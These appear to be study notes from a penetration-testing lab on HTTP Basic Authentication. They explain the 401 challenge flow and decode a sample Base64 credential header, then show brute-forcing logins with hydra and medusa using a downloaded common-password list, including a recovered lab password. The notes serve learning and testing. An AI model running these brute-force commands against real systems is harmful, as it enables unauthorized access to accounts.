BASIC HTTP AUTHENTICATION

Basic Authentication is an authentication mechanism used to protect sensitive data and functionalities of web applications. this is a challenge-response protocol where a web server demands user credentials before granting access to protected resources. The process begins when a user attempts to access a restricted area. The server responds with a 401 Unauthorized status and a WWW-Authenticate header prompting the user's browser to present a login dialog. Once the user provides their username and password, the browser concatenates them into a single string, separated by a colon. This string is then encoded using Base64 and included in the Authentication header of subsequent requests, following the format Basic <encodedCredentials>. The server decodes the credentials, verifies them against its database, and grants or denies access accordingly.

BASIC AUTHENTICATION GUI

WEB LOGIN FORM GUI

EXAMPLE HTTP GET BASIC AUTH

GET /protected_resource HTTP/1.1
Host: www.example.com
Authorization: Basic YWxpY2U6c2VjcmV0MTIz

root@oco:~$ echo -n YWxpY2U6c2VjcmV0MTIz | base64 -d
 * alice:secret123

HYDRA

root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
 * the -s means silent mode. it suppresses the progress bar and error messages, providing a cleaner output
 
root@htb:~$ hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.55.60 http-get / -s 43574
 * [43574][http-get] host: 94.237.55.60   login: basic-auth-user   password: Password@123
 
root@htb:~$ curl -u basic-auth-user:'Password@123' 94.237.55.60:43574

MEDUSA

root@oco:~$ nano webServers.txt
 ...
roto@oco:~$ nano usernames.txt
 ...
root@oco~:$ nano passwords.txt
 ...
 
root@oco:~$ medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET -t 64